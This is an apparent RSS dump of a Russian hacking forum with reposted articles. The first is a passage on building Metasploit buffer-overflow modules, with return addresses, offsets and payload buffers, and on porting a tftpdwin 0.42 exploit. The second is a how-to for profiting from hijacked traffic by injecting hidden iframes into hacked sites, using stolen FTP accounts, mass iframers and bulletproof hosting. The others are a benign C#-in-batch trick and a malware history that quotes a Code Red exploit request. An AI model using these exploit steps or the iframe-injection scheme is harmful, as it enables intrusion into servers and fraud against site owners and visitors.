						&lt;p&gt;Любой эксплоит для Metasploit имеет фиксированную структуру, которая состоит из объявления заголовочных файлов, подключения ядра msf/core, определения класса эксплоита, в котором описывается его функциональность. Я не буду приводить здесь полный исходник модуля, но выкладываю его на диске. Рекомендую для большей ясности открыть его прямо сейчас и далее читать мое практически построчное объяснение его кода.&lt;br /&gt;Первое, с чего начинается любой сплоит, – это подключение ядра Metasploit Framework:&lt;/p&gt;
						&lt;p&gt;require &#039;msf/core&#039;&lt;/p&gt;
						&lt;p&gt;Функциональность любого сплоита описывается с помощью класса, где его настройки задаются с помощью параметров, а функциональность – с помощью методов. Создаваемый объект наследуется от одного из предопределенных классов. Поскольку мы создаем удаленный сплоит, то и наследуем наш объект от родительского класса &amp;quot;Удаленный эксплоит&amp;quot;. В синтаксисе Ruby это делается так: &lt;/p&gt;
						&lt;p&gt;class Metasploit3 &amp;lt; Msf::Exploit::Remote.&lt;/p&gt;
						&lt;p&gt;Большая заслуга Metasploit в том, что он унифицирует большое количество параметров и действий, позволяя использовать готовые конструкции вновь и вновь. Первый элемент разрабатываемого класса – секция include, где мы подключаем обработчик для нужного нам протокола. В Metasploit есть обработчики для http, ftp и других протоколов, что позволяет быстрее писать эксплоиты, не заморачиваясь с их собственной реализацией. Наш эксплоит использует TCP-подключение, поэтому код будет выглядеть следующим образом:&lt;/p&gt;
						&lt;p&gt;include Msf::Exploit::Remote::Tcp&lt;/p&gt;
						&lt;p&gt;Далее весь сплоит делится на два метода: метод инициализации, в котором мы указываем информацию, необходимую для успешного выполнения эксплоита, и метод эксплуатации, в котором мы отправляем на сервер ядовитую строку.&lt;/p&gt;
						&lt;p&gt;Начнем с инициализации. Параметр Payload задает длину ядовитого буфера и недопустимые символы (в нашем случае – 0х00 и 0xff):&lt;/p&gt;
						&lt;p&gt;&#039;Payload&#039; =&amp;gt;&lt;/p&gt;
						&lt;p&gt;{&lt;/p&gt;
						&lt;p&gt;&#039;Space&#039; =&amp;gt; 1400,&lt;/p&gt;
						&lt;p&gt;&#039;BadChars&#039; =&amp;gt; &amp;quot;\x00\xff&amp;quot;,&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;Далее определяем цели эксплоита и специфичные для каждой цели параметры, такие как адрес возврата, смещение и т.д.:&lt;/p&gt;
						&lt;p&gt;&#039;Platform&#039; =&amp;gt; &#039;win&#039;,&lt;/p&gt;
						&lt;p&gt;&#039;Targets&#039; =&amp;gt;&lt;/p&gt;
						&lt;p&gt;[&lt;/p&gt;
						&lt;p&gt;[&#039;Windows XP SP2 En&#039;,&lt;/p&gt;
						&lt;p&gt;{ &#039;Ret&#039; =&amp;gt; 0x0x71ab9372, &#039;Offset&#039; =&amp;gt; 504 } ],&lt;/p&gt;
						&lt;p&gt;[&#039;Windows 2003 Server R2 SP2&#039;,&lt;/p&gt;
						&lt;p&gt;{ &#039;Ret&#039; =&amp;gt; 0x71c02b67, &#039;Offset&#039; =&amp;gt; 504 } ],&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;... &lt;/p&gt;
						&lt;p&gt;]&lt;/p&gt;
						&lt;p&gt;Обрати внимание, мы не определяем сам шелл-код – то есть, нагрузку, которую выполнит сплоит. Действие на удаленной машине будет выбираться интерактивно во время работы в консоли Metasploit&#039;ом. Сейчас нам остается только написать самое главное - метод для эксплуатации уязвимости. С помощью команды connect устанавливаем TCP-соединение (обработчик протокола мы подключили выше и даже указали порт, помнишь?), далее – определяем ядовитую строку и передаем ее в сокет, после чего разрываем соединение. Ядовитый буфер состоит из цепочки NOP-команд, величины Offset - затем к ней прибавляется адрес возврата, еще небольшая NOP-цепочка и зашифрованный PAYLOAD. Все вместе выглядит так:&lt;/p&gt;
						&lt;p&gt;def exploit&lt;/p&gt;
						&lt;p&gt;connect&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;junk = make_nops(target[&#039;Offset&#039;])&lt;/p&gt;
						&lt;p&gt;sploit = junk + [target.ret].pack(&#039;V&#039;) + make_nops(50) + payload.encoded&lt;/p&gt;
						&lt;p&gt;sock.put(sploit)&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;handler&lt;/p&gt;
						&lt;p&gt;disconnect&lt;/p&gt;
						&lt;p&gt;end&lt;/p&gt;
						&lt;p&gt;Вот и все, наш первый модуль для Metasploit готов! Чтобы его можно было использовать, скопируем исходник в папку modules/exploits/test (если не нравится test – можешь скопировать в windows/misc, например). Запускаем msfconsole и работаем в интерактивной консоли Metasploit&#039;а!&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;Эксплоит за 5 минут&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Как видишь, разработать эксплоит для Metasplot не так сложно. Скорее даже наоборот, ведь большая часть работы уже сделана за тебя. Взять хотя бы огромную базу шелл-кодов – попробуй разработать свой. Но лени человеческой нет предела, поэтому в стремлении еще больше упростить процесс был разработан пакет утилит тебе MSF eXploit Builder. Программа имеет удобный графический интерфейс и поможет по-настоящему быстро создавать новый модуль для Metasploit. Кроме удобного GUI, eXploit Builder включает в себя целую кучу полезных тулз, необходимых для отладки и тестирования эксплоитов. Более того – можно опять же создавать с нуля, а портировать уже существующие сплоиты.&lt;/p&gt;
						&lt;p&gt;Предлагаю взять какой-нибудь эксплоит и с помощью MSF eXploit Builder превратить его в Metasploit-модуль. Ты спросишь, зачем это нам надо? Опять же: превратив его в Metasploit-модуль, мы можем использовать его вместе с различными payload-ами. Проще говоря, это сделает его более универсальным и кроссплатформенным. Сейчас ты сам убедишься, насколько эта программа может упростить жизнь - ведь теперь для написания и отладки эксплоита не нужно даже знание Ruby и Metasploit API. В качестве кролика для эксперимента я выбрал первое, что попалось, - сплоит для tftpdwin 0.42 (milw0rm.com/exploits/7452).&lt;/p&gt;
						&lt;p&gt;Запускаем MSF eXploit Builder, заходим в меню &amp;quot;Editor&amp;quot; и выбираем &amp;quot;New&amp;quot;. Появляется окно с несколькими вкладками (Information, Badchars, Analysis, Shellcode, Design). Переходим на вкладку &amp;quot;Information&amp;quot; и видим много интересных полей. Как ты помнишь, в этой секции указываются цели (OS + SP) и тип/протокол эксплоита (например, remote/tcp). Более того, программа предоставляет нам возможность тестирования и отладки полученного эксплоита, поэтому тут же можно выбрать исполняемый файл и указать параметры для его запуска (порт, ip-адрес).&lt;/p&gt;
						&lt;p&gt;Итак, выбираем наш tftpd.exe, после чего утилита предложит следующие действия на выбор: запустить приложение, запустить его под отладчиком или не запускать вообще – просто запустим приложение. Обрати внимание, что справа сбоку отобразится список загруженных приложением DDL&#039;ек.&lt;/p&gt;
						&lt;p&gt;Теперь начинаем смотреть код сплоита – на наше счастье он предельно понятный. Комментарий &amp;quot;Restricted chars = 0x00 0x6e 0x65 0x74&amp;quot; явно указывает на запрещенные символы – что ж, выставим их в нашей программе. Для этого переходим на вкладку Badchars и в одноименном поле вводим: \x00\x6e\x65\x74. Далее по коду мы видим, как формируется ядовитый пакет:&lt;/p&gt;
						&lt;p&gt;my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));&lt;/p&gt;
						&lt;p&gt;Разбираемся с каждой составляющей и заодно составляем буфер для отправки во вкладке &amp;quot;Design&amp;quot;. Сначала идет переменная $p1 (my $p1=&amp;quot;\x00\x01&amp;quot;;). Вводим их в поле Value (Operation по умолчанию оставляем RAW). За ней идет переменная $nopsled (my $nopsled = &amp;quot;\x90&amp;quot; x 10;) - выбираем Operation = NOP и устанавливаем длину в 10. Далее располагается $shellcode - устанавливаем Operation = PAYLOAD и Length = 0. Следующая часть - $overflow (my $overflow = “\x41” x $len; строка из символов &amp;quot;А&amp;quot; длиной в $len). Переменная my $len = (274 - length($shellcode)), то есть строка длиной 274 символа минус длина шелл-кода. Выставляем Operation = RAW, Length = 274 и выбираем (нажимаем поочередно) вверху кнопки RAW could be: rand_text_alpha, -payload.encoded.length, что означает: длина строки будет высчитываться по вышеприведенной формуле. Потом добавляем адрес возврата $ret (my $ret = “\x5d\x10\x40”) и выбираем Operation = RET. Наконец, добавляем $p2, равное &amp;quot;\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00&amp;quot; и выбираем Operation = RAW. Ядовитый пакет готов.&lt;/p&gt;
						&lt;p&gt;Собственно, теперь у нас есть все для создания готового сплоита. Поэтому нажимаем на кнопку &amp;quot;Generate&amp;quot; и любуемся кодом получившегося сплоита. Если какие-то моменты вызывают сомнения, тут же можно отредактировать код вручную. Классно, что возможно сразу проверить работоспособность кода – для этого смело жмем кнопку &amp;quot;Test&amp;quot;. И ведь – все работает! За 5 минут, которые ушли на ознакомление с программой, и без всякого знания, как языка Ruby, так и структуры Metasploit, мы создали полностью рабочий сплоит. Это дорогого стоит! В качестве домашнего задания попробуй с помощью MSF eXploit Builder создать эксплоит для нашего сервера :).&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Вот и закончилась наша экскурсия по фабрике эксплоитов. Знать, как устроены сплоиты, полезно во многих отношениях. Не умея прочитать шелл-код в свежем эксплоите или, вообще, запуская непонятный exe&#039;шник, далеко не всегда можно доверять его создателю. Многие сплоиты выпускаются в паблик с отсутствующими частями и специально оставленными ошибками – это непременно остановит армию скрипткидис, но для понимающего человека едва ли станет серьезной задачей. Надеюсь, я сегодня убедил тебя, что ничего нереального в сплоитах нет: ведь хакеры люди – логичные и понятные :).&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;INFO&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Подробная информация об Metasploit API:&lt;/p&gt;
						&lt;p&gt;wwwmetasploit.com/documents/api/msfcore/index.html&lt;/p&gt;
						&lt;p&gt;Блог Metasploit Framework:&lt;/p&gt;
						&lt;p&gt;blog.metasploit.com&lt;/p&gt;
						&lt;p&gt;Статья по доработке эксплоита:&lt;/p&gt;
						&lt;p&gt;en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit&lt;/p&gt;
						&lt;p&gt;Видео, показывающее, как создать Portable-версию Metasploit для размещения на флешке:&lt;/p&gt;
						&lt;p&gt;wwwwonderhowto.com/how-to/video/how-to-create-a-metasploit-meterpreter-executable-file-263017&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;WARNING&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Информация представлена исключительно в ознакомительных целях, чтобы показать, чего стоят критические уязвимости в коде и как злоумышленники могут их использовать. Не повторяй эти действия в противозаконных целях. В противном случае автор и редакция ответственности не несут!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:52:48 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=8#p8</guid>
		</item>
		<item>
			<title>У истоков трафа</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: olive&quot;&gt;Ввведение&lt;/span&gt;&lt;br /&gt;Я думаю ты не раз встречал топики на форумах, в которых продается\покупается траф, предлагают ддос услуги, продаются сосксы и т.д. Не задумывался ли ты когда-нибудь откуда все это берется, и сколько можно на этом заработать? В этой статье я хочу рассмотреть истоки всего этого, а именно организацию траф сервиса. Что же такое траф? Траф, грубо говоря можно назвать потоком посетителей на ваш сайт. Что же нам понадобится для нашего сервиса?&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;Основная часть&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: olive&quot;&gt;1) Хостинг&lt;/span&gt;&lt;br /&gt;Прежде всего нам нужен хостинг(аккаунт или сервер, в зависимости от ширины твоего кошелька). Но брать первый попавшийся хост(из обычных, которые предлагают на каждом углу), или устроиться на чужом(взломанном и т.д.) не логично. Почему? Во-первых, админы могут просто обнаружить присутствие постороннего на сервере, во-вторых, приток наших посетителей будет создавать лишнюю нагрузку(если кол-во большое, а сервер слабый), в-третьих, на хост может прийти так называемая абуза(жалоба), последиствием которой станет блокировка аккаунта\домена. Таким образом я предлагаю остановиться на абузоустойчивом хостинге. В чем его преимущества? Данный хостинг создан специально для черных целей, администрация ДЦ, где расположены сервера игнорируют абузы(жалобы), отсюда и название. На данный момент цены на такой хостинг начинаются от 50 $ и заканчиваются парами тысячами $ в месяц(цена зависит от того что вы хотите, какие у вас запросы и т.д.). Если вы хотите серьезно заняться трафом, то советую сразу останавливать свое внимание на проверенных сервисах(смотрите на цены, кол-во отзывов, время работы в данной сфере и т.д.) и не экономьте на этом. Также к этому можно отнести и абузные домены(например в зоне .cn), которые тоже сейчас можно приобрести(средняя цена 20$ в год).&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: olive&quot;&gt;2) Софт\скрипты&lt;/span&gt;&lt;br /&gt;Ну вот теперь у нас есть свой хост, так что можно смело двигаться дальше. Теперь нам нужен какой-то софт\скрипты для продажи трафа. Допустим наш траф идет к нам на хост wwwsite.ru, а нам нужно к примеру направить 1000 посетителей на сайт wwwsit2.ru как же быть? Для этого были придуманы TDS(системы распределения трафика). В чем заключается их смысл? Весь трафик мы пускаем на нашу TDS, а она уже производит перенаправление трафика на другие сайты. Цены на TDS начинаются от 30$, от чего же зависит цена? От возможностей TDS:определение версий браузеров, определение страны откуда пришел траф, создание различных схем с приоритетами, минимальные потери при перенапрвлении, удобство использования, нагрузка на сервер(например какую базу использует для хранения информации: MySQL\текстовые файлы), реферальная статистика и много другое(обо всем немного позднее).&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: olive&quot;&gt;3) Где взять траф?&lt;/span&gt;&lt;br /&gt;Теперь когда у нас есть хост и система распределения трафа нужно ответить на самый главный вопрос - а где же взять траф? Есть много различных способов, например рассылка сообщений с ссылкой на ваш сайт по ICQ, e-mail, гостевым книгам, форумам и т.д. Но этот способ не дает хороших результатов, т.к. может лишь дать волну трафа, но не постоянный. Самый известный и распространненый способ это iframe траф. Как же его сделать? Для этого нам понадобится доступ к хорошо посещаемый ресурсам, это может быть взломанный\уганный фтп аккаунт к ресурсу, шелл и т.д. Далее когда у нас есть доступ к ресурсу, нужно как-то незаметно для админов перенаправить посетителей на наш сайт(на TDS). Для этого используются iframe. Ифрейм это небольшое &amp;quot;окно&amp;quot; обычно размером 1 на 1 пиксель, которое не видно человеческому глазу, в этом окне как раз и открывается наш сайт. Iframe имеет такой вид , где в параметре src указывается адресс нашего сайта. Тоесть мы берем данный код и вставляем в страницы сайтов, которые мы взломали\взяли.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: olive&quot;&gt;4) Дополнение&lt;/span&gt;&lt;br /&gt;В зависимости от тематики сайтов, с которых идет траф, его можно разделить на разные типы:бизнес(с бизнес сайтов), адалт(с любых порно ресурсов), mix(смешаный, тоесть всего по немногу), также траф можно разделить и по странам. Соответственно чем лучше(качественнее) наш трафик, тем дороже его можно будет продать. Немного вернусь к вопросу про фтп. А что делать если у нас несколько тысяч взломанных фтп и на нам нужно на каждом разместить наш код? Если это делать руками, то на это уйдет неделя&amp;#160; Для таких дел были сделаны специальные фтп checkers/iframers. Их задача как раз и заключается в том, чтобы в автоматическом режиме вставлять нужный нам год в страницы. Также в них присутствуют некоторые доп. функции, например удаление чужих фреймов(а зачем нам конкуренты?&amp;#160; ), проверка сайтов на PR и многое другое. Также хочу отметить, чтобы админы быстро не увидели наши фреймы с своих страницах нужно их шифровать(в принципе этому посвящено немало интересных статей, поройся).&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;Вывод&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: olive&quot;&gt;1) Итог&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Подведем небольшой итог, у нас есть абузный хост, на нем стоит наша TDS на которую идет траф со взломанных ресурсов. В принципе все готово для продажи трафа, остается найти клиентов и создать схему перенаправления в нашей TDS.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: olive&quot;&gt;2) Некоторые тонкости&lt;/span&gt;&lt;br /&gt;Но я хочу остановить еще внимание не некоторых тонкостях, которые сделают вашу жизнь легче&amp;#160; На данный момент на рынке преобладает mix траф, тоесть это траф с сайтов различной тематики, разные страны и т.д. тоесть все свалено в кучу. Когда покупаете\продаете такой траф всегда лучше проводить тест, например 1000-2000 уников. Часто возникают вопросы о различии общего и уникального трафа. Стоит заметить, что человек зайдя на сайт, может просмотреть несколько страниц, а если на каждой висит наш фрейм, то получается что он будет учтен в нашем трафе дважды. Для этого в TDS есть отбор уников, тоесть используются только реальные уникальные посетители(например идентификация по ip). У сайта посещаемость можеть быть 10000 в день, а из них уникальных посетителей только 2000. Также хочу обратить ваше внимание на покупку фтп(так как щас развелось очень много людей продающих фтп в несколько рук). Лучшего всего покупать хорошо посещаемые фтп, лучше взять 4-5 но вы сам увидите эти сайты, чем брать 1500 фтп за 100 $ с которых трафа будет 0, да и их еще продадут в несколько рук. Средний заработок в день скалдывается из кол-ва трафа, который вы имеете в день(учитывается только уникальный). По своему опыту могу сказать, что качественный траф на данный момент имеет высокий спрос, и очень часто чтобы купить траф приходится ждать в очереди по несколько дней. Средняя цена за 1000 уников сейчас от 3-7$ .&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 8px&quot;&gt;http://forum.xeka.ru/f77/t3546/&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:51:45 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>Код С# в bat-файле</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;Маленькая забавность о том, как использовать все возможности dotNet в обычных bat-скриптах. Или сделать скриптовый язык из С#.&lt;br /&gt;Далее рассказан простой способ скомпилировать и запустить код С#, который находится внутри bat-файла.&lt;/p&gt;
						&lt;p&gt;Не буду долго томить:&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;/* &lt;br /&gt;@echo off &amp;amp;&amp;amp; cls&lt;br /&gt;set WinDirNet=%WinDir%\Microsoft.NET\Framework&lt;br /&gt;IF EXIST &amp;quot;%WinDirNet%\v2.0.50727\csc.exe&amp;quot; set csc=&amp;quot;%WinDirNet%\v2.0.50727\csc.exe&amp;quot;&lt;br /&gt;IF EXIST &amp;quot;%WinDirNet%\v3.5\csc.exe&amp;quot; set csc=&amp;quot;%WinDirNet%\v3.5\csc.exe&amp;quot;&lt;br /&gt;IF EXIST &amp;quot;%WinDirNet%\v4.0.30319\csc.exe&amp;quot; set csc=&amp;quot;%WinDirNet%\v4.0.30319\csc.exe&amp;quot;&lt;br /&gt;%csc% /nologo /out:&amp;quot;%~0.exe&amp;quot; %0 &lt;br /&gt;&amp;quot;%~0.exe&amp;quot;&lt;br /&gt;del &amp;quot;%~0.exe&amp;quot;&lt;br /&gt;exit&lt;br /&gt;*/&lt;/p&gt;
						&lt;p&gt;class HelloWorld&lt;br /&gt;{&lt;br /&gt;static void Main()&lt;br /&gt;{&lt;br /&gt;System.Console.WriteLine(&amp;quot;Hello, World!\r\nI am at &amp;quot; + System.Environment.Version);&lt;br /&gt;System.Console.ReadLine();&lt;br /&gt;}&lt;br /&gt;}&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;Разберем, как это получается.&lt;br /&gt;Сначала работает bat-интерпретатор. Первую строчку скрипта он не понимает и выдает ошибку. Но не страшно, это чисто визуальное неудобство. Подчистим за ним во второй строчке.&lt;br /&gt;Далее пытаемся найти каталог с компилятором csc.exe и запускаем его.&lt;br /&gt;Компилятор .Net Framework&#039;a, csc в качестве аргумента принимает путь к файлу с исходником. В нашем случае исходник находится в теле bat-файла(строки 13–20). Текст bat-команд игнорируется, как комментарий(строки 1 и 11).&lt;br /&gt;После работы компилятора, получаем исполняемый файл, который запускаем и удаляем после завершения его работы.&lt;br /&gt;Работа bat-интерпретатора заканчивается на 10 строке (exit).&lt;/p&gt;
						&lt;p&gt;Этот подход работает на Vista/7 «из коробки» и на ХР, с установленным .Net Framework.&lt;br /&gt;Целесообразность, конечно, сомнительная. Так, just for fun.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 8px&quot;&gt;http://habrahabr.ru/blogs/net/107659/#habracut&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:50:43 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>10 лучших вирусов</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;span style=&quot;color: yellow&quot;&gt;&lt;strong&gt;История зла 1999-2009&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;САМАЯ НАШУМЕВШАЯ МАЛВАРЬ ЗА ПОСЛЕДНИЕ 10 ЛЕТ&lt;br /&gt;Каждый день — новая зараза. С таким разнообразием всевозможной живности появление новой малвари просто перестаешь замечать. И все-таки, были эпидемии, которые не прошли незамечено. Мы решили вспомнить последние 10 лет и выбрать за каждый год наиболее запомнившуюся заразу.&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Melissa&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Едва ли программист из Нью-Джерси задумывался о том, чтобы собрать ботнет из миллионов машин и использовать его для рассылки спама. Вряд ли он мог представить последствия, создавая своего, казалось бы, безобидного червя Melissa. Ведь даже распространение тот начинал не с инета — впервые червь был обнаружен 26 марта в конференции alt.sex внутри Usenet — в то время еще популярной сети для общения и обмена файлами. К сообщению был приложен файл List.DOC, содержащий пароли на 80 порнушных сайтов: позарившись на «клубничку», файлик с радостью открыли многие. А дальше пошло-поехало: червь тут же начал распространение, отправляя себя по 50 первым контрактам из записной книжки пользователя. Это был первый успешный червь, распространяемый через e-mail.&lt;br /&gt;Когда Melissa открывает зараженный документ MS Word 97/2000, запускается специальный макрос, который рассылает копии червя в сообщениях электронной почты при помощи обычного Outlook’а. Для этого червь юзает возможность Visual Basic активизировать другие приложения MS Windows и использовать их процедуры. Вирус вызывает MS Outlook, считывает из адресной книги первые 50 email’ов и посылает по этим адресам сообщения. Написав в мессаге текст аля «Вот документ, о котором ты меня спрашивал», червь приаттачивал к письму текущий открытый документ пользователя, предварительно заражая его. Последнее, кстати, повлекло за собой массу курьезных ситуаций и, в ряде случаев — утечки конфиденциальной информации. В 1999 году пользователи даже не задумывались о том, что в аттаче от известного им адресата может быть какая-то зараза, и активно открывали вложения.&lt;br /&gt;Стремительное распространение вируса серьезно нагрузило почтовые серверы — им пришлось обрабатывать на несколько порядков больше отправлений, чем обычно. Тысячи машин по всему миру не выдержали нагрузки и вышли из строя. К 27 марта распространение вируса приняло характер эпидемии; 29 марта он проник уже на компьютеры всех стран мира, подключенных к Сети, в том числе и на российские.&lt;br /&gt;Найденному силами ФБР Девиду Смиту, который и написал те три десятка строк кода на VB, грозили 10 лет тюрьмы, но парень «легко отделался», получив 20 месяцев заключения и штраф в $5000. Однако исходники червя еще долго мусолили хакеры, плодя различные модификации Melissa.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://i082.radikal.ru/1008/e0/cc4a6ddf12a2.bmp&quot; alt=&quot;http://i082.radikal.ru/1008/e0/cc4a6ddf12a2.bmp&quot; /&gt;&lt;br /&gt;весь код Melissa умещался в 100 строчках&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Loveletter&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;В следующем году — новая почтовая эпидемия, вызванная вирусом Love Letter (или Love Bug). Письма, содержащие незамысловатое ILOVEYOU в строке темы, посыпались на ничего не подозревавших пользователей градом. И все было бы замечательно, если бы к письму не был приложен скриптик на Visual Basic Script, замаскированный под текстовый файл.&lt;br /&gt;The Subject: ILOVEYOU&lt;br /&gt;Message body: kindly check the&lt;br /&gt;attached LOVELETTER coming from me.&lt;br /&gt;Attached file: LOVE-LETTER-FORYOU.TXT.vbs&lt;br /&gt;На лицо отличный пример социальной инженерии и прием двойного расширения, — что помогло скрыть подлинную природу файла. По умолчанию Винда не показывала второе, настоящее, расширение файла, поэтому принять аттач за обычный текстовик действительно было проще простого. Ну а коль пользователь файл запустил, можно делать свое дело. Написанная с использованием механизма Windows Scripting Host, малварь честно рассылает копии тела по всем адресам из адресной книги почтовой программы MS Outlook, после чего приступает к деструктивной части, закачивая и устанавливая в системе троя. Путь до исполняемого файла прописывался как домашняя страница в параметрах Internet Explorer. Это обеспечивало его автоматическую загрузку, а запуск в системе гарантировал специально созданный ключ в реестре. Далее домашняя страница возвращалась на свое место — и ушастый пользователь даже не замечал изменений. Тем временем, WIN-BUGSFIX.EXE или Microsoftv25.exe честно отправлял автору отснифанные пароли.&lt;br /&gt;Трик с использованием двойного расширения автор заюзал не только в письмах. Для файлов целого ряда расширений, червь создавал свои копии, добавляя к их названию расширение .vbs. Если в папке был файл rulez.mp3, то тут же создавался rulez.mp3.vbs с телом червя — и так повсюду.&lt;br /&gt;В основе другого способа распространения, который так же давал плоды, лежали скрипты для mIRC — самой распространенной программы для бешено популярных тогда IRC-чатов. Пользователям чата автоматически передавалась HTML-ка, предлагающая закачать некий ActiveX-элемент. Что находилось внутри, объяснять не надо, но поверь на слово: посмотреть, что прислал им хороший приятель, соглашались очень многие.&lt;br /&gt;Первый случай активности Love Letter был зафиксирован 4 мая 2000 г., а уже через сутки им были частично или полностью поражены сети ЦРУ, NASA, Министерства энергетики, конгресса США, Пентагона, британской палаты общин и еще множества организаций. Ущерб, нанесенный червем в первые дни активности, был оценен в $5 миллионов. Офигительно? Виновника этого безобразия помог найти оставленный им автограф: «barok -loveletter(vbe) &amp;lt; i hate go to school &amp;gt; by: spyder / ispyder@mail.com / Manila,Philippines». Но в виду отсутствия местных законов за подобные преступления, никакой ответственности он не понес.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s56.radikal.ru/i153/1008/83/8547b1ac1aaf.bmp&quot; alt=&quot;http://s56.radikal.ru/i153/1008/83/8547b1ac1aaf.bmp&quot; /&gt;&lt;br /&gt;а вот так выглядело письмо ILOVEYOU&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Code Red&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Из-за этого червя сайту Белого дома США в 2002 году пришлось поменять IP-адрес . Стартовавшего 13 июля 2001 года, Code Red интересовали виндовые машины с запущенным веб демоном IIS на борту и включенной системой индексирования. О существовании критической уязвимости, приводящей к переполнению буфера, в Microsoft знали задолго до появления вируса, а за месяц до эпидемии была опубликована заплатка. Впрочем, это не помешало запущенному 13 июля червю заразить за 6 следующих дней более 350 тысяч машин. Брешь в ISS позволяла легко выполнять на сервере удаленный код. Разработчики Code Red не сильно заморачивались и приделали эксплоит к простейшему сканеру, который работал «в лоб». Во время сканирования Code Red не проверял наличие IIS на новом компьютере-жертве, а тупо отправлял специально сформированные HTTP-запросы на сгенерированные случайно IP-адреса в надежде, что где-то на 80-порту окажется вожделенный IIS. Море запросов— огромный объем трафика. В итоге, оборудование попросту стало задыхаться от мусорных GET-запросов, которые генерировали ноды по всему мира. В логах Apache, на который, естественно, уязвимость IIS не распространялась, можно было обнаружить подобные строки:&lt;br /&gt;GET /default.ida?NNNNNNNNNNNNNNNNNN&lt;br /&gt;NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN&lt;br /&gt;NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685&lt;br /&gt;8%ucbd3%u7801%u9090%u6858%ucbd3%u7&lt;br /&gt;801%u9090%u6858%ucbd3%u7801%u9090%&lt;br /&gt;u9090%u8190%u00c3%u0003%u8b00%u531&lt;br /&gt;b%u53ff%u0078%u0000%u00=a HTTP/1.0&lt;br /&gt;В процессе работы Code Red не использовал никаких временных или постоянных файлов. Червь уникален: он существовал либо в системной памяти зараженных компьютеров, либо в виде TCP/IP-пакета при пересылке на удаленные машины. Но наличие заразы на сервере обнаруживалось без всякого антивируса. Поскольку в памяти компьютера могли существовать сразу сотни активных процессов Code Red, то тормоза и лаги были неизбежны. Червь заменял содержимое страниц на зараженных серверах на сообщение: «HELLO! Welcome to &lt;a href=&quot;http://www.worm.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.worm.com&lt;/a&gt;! Hacked By Chinese!», но был избирателен и дефейсил только те системы, где в качестве основного языка был установлен английский.Через некоторое время, правда, дефейс снимался автоматически: видимо, разработчики не хотели раньше времени терять драгоценную ноду.&lt;br /&gt;Между 20 и 28 числами месяца тело червя должно было начать DoS-атаку на несколько IP-адресов, один из которых принадлежал американскому Белому 